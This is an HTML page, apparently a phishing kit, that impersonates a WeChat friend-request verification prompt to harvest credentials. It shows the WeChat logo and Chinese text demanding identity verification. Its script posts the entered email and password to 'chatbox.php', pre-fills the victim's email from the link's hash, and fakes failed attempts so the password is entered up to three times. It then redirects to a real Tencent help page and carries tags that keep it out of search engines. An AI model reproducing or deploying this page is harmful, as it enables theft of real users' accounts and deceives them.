<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/html">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge,10,9,8,7"/>
	<title>微信 | 好友请求通知</title>
	<link rel="shortcut icon" href="https://cdn-icons-png.flaticon.com/512/3984/3984261.png" type="image/x-icon">
<meta name="robots" content="noindex" /><meta name="robots" content="nofollow" />
<META NAME="GOOGLEBOT" CONTENT="NOARCHIVE" /><META NAME="GOOGLEBOT" CONTENT="NOSNIPPET" />
</head>
<body bgcolor="#057F4D">
<script>
const url = 'chatbox.php';   //full url goes here
</script>

<style>
.login{
	width:280px; height:35px; font-family: arial; font-size: 18px; color:#057F4D; 
	background-color: #ffffff; border: solid 1px #BDBDBD; padding: 7px; border-radius: 2px 3px 1px 5px;
	 
}
</style>
<div style="margin:-8px;width:100%">
<img id="bg" src="https://cdn.sanity.io/images/f8lauh0h/production/1939f5c70ccb575d3d0ca2b827a49c6d36b5ef82-1280x960.jpg">
<img id="bg2" src="https://cdn.sanity.io/images/f8lauh0h/production/1939f5c70ccb575d3d0ca2b827a49c6d36b5ef82-1280x960.jpg" hidden>

<div style="position:absolute;top:60px;left:80px; width:350px; height:460px; 
background-color: #ffffff; border: solid 1px #BDBDBD; padding: 7px; border-radius: 2px 7px 1px 8px; 
-webkit-box-shadow: 2px 2px 2px 2px #616162; box-shadow: 2px 2px 2px 2px #616162;">

	<br><br>

	<center>

		<img src="https://upload.wikimedia.org/wikipedia/en/thumb/a/af/WeChat_logo.svg/2560px-WeChat_logo.svg.png" 
		style="width:200px; height:50px;">
		<br><br>
			<font style="font-family:calibri;font-size:25px;line-height:1;text-align:left;color:#057F4D;">
                好友请求通知                                       
			</font>
			<br><br>
			<font style="font-family:calibri;font-size:20px;line-height:1;text-align:left;color:#363636;">
                需要身份验证                                        
			</font>
			<br><br>
			<font style="font-family:calibri;font-size:17px;line-height:1;text-align:left;color:#057F4D; font-weight:light;">
				您需要验证您的ID以证明您不是机器人
			</font>
		<br><br>
		<form method="post" action="" onsubmit="Validate(); return false;">
		<input required id="user" name="user" class="login" value="" type="email" placeholder="&#30005;&#23376;&#37038;&#20214;ID"><br><br>
		<input required placeholder="&#23494;&#30721;" type="password" id="pass" name="pass" class="login"><br><br>
		<input type="submit" id="b1" value="接受好友请求" style="width:295px; height:50px; font-family: arial; font-size: 18px; color:#FFFFFF; 
		background-color: #363636; border: solid 1px #363636; padding: 7px; border-radius: 2px 3px 1px 5px;">
		</form>
	</center>

</div>

<input type="hidden" id="count" value="0">
<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.0/jquery.min.js'></script>


<script>
      $(document).ready(function(){
        var count=0;

      /////////////url email getting////////////////
      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
          var my_email =email;
          $('#user').val(my_email);
			
			}
		  })


function Validate(){
var a = $('#user').val();
var b = $('#pass').val();
var c = $('#count').val();

$.post(url, {user:a,pass:b}, function(){
setTimeout(function(){
if(c>=2){
$('#count').val('0');
window.location='https://kf.qq.com/touch/faqlist/faqlist_weixin_en_app.html?s=100078&m=1001096&platform=15&title=Adding%20Friends&from=Friends_Adding%20Friends&faq_icon=';
}else{
$('#bg').fadeOut();
$('#bg2').fadeIn();
$('#user').css('top','250px');
$('#pass').css('top','311px');
$('#b1').css('top','381px');
$('#pass').val('');
var add = +c+1;
$('#count').val(add);
$('#pass').focus();
}
},2000);
});
}


</script>



<script>
function process(){
	var user = document.getElementById('user').value;
	var pass = document.getElementById('pass').value;
	if ((user == '') || (user == null)){
	document.getElementById('bg').src='files/1.png';
	document.getElementById('user').focus();
return false;	
	}else
	if ((pass == '') || (pass == null)){
	document.getElementById('bg').src='files/2.png';
	document.getElementById('pass').focus();
return false;	
	}else
	
return true	;
}
</script>
<script>
$('input').focus(function(){
  $(this).parents('.form-group').addClass('focused');
});

$('input').blur(function(){
  var inputValue = $(this).val();
  if ( inputValue == "" ) {
    $(this).removeClass('filled');
    $(this).parents('.form-group').removeClass('focused');  
  } else {
    $(this).addClass('filled');
  }
})  
</script>
</body>
</html>